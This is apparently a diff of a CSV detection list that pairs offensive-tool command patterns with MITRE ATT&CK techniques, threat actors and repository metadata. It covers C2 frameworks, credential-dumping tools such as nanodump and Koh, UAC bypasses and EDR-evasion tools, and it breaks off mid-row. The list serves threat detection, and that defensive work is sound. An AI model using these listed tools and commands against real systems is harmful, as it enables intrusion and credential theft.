-"\Posh*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"\NtRemoteLoad.exe*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"\Posh*","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "afrog -*","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","0","N/A","N/A","10","2135","272","2023-09-28T09:41:46Z","2022-02-24T06:00:32Z" -"BypassUAC *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"BypassUAC *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "cd PayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","","N/A","","","" -"certipy *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"cme smb -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"dcenum *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"certipy *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme smb -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"dcenum *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "delete_file *.dll","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "detect-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "doc.1a.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" @@ -18696,7 +18885,7 @@ "doc.tx.*\.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-prepend*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-sh*.*","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" -"dumpwifi *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"dumpwifi *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "etw stop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "EVUAC *","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","0","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "exploit -j -z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" @@ -18708,11 +18897,11 @@ "getprivs","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "get-spns *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "grab_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"Impacket *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"hydra -*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"Impacket *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "impersonate *\*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "import boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" -"inceptor*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"inceptor*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "kerberoast *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "koh exit*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "koh list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 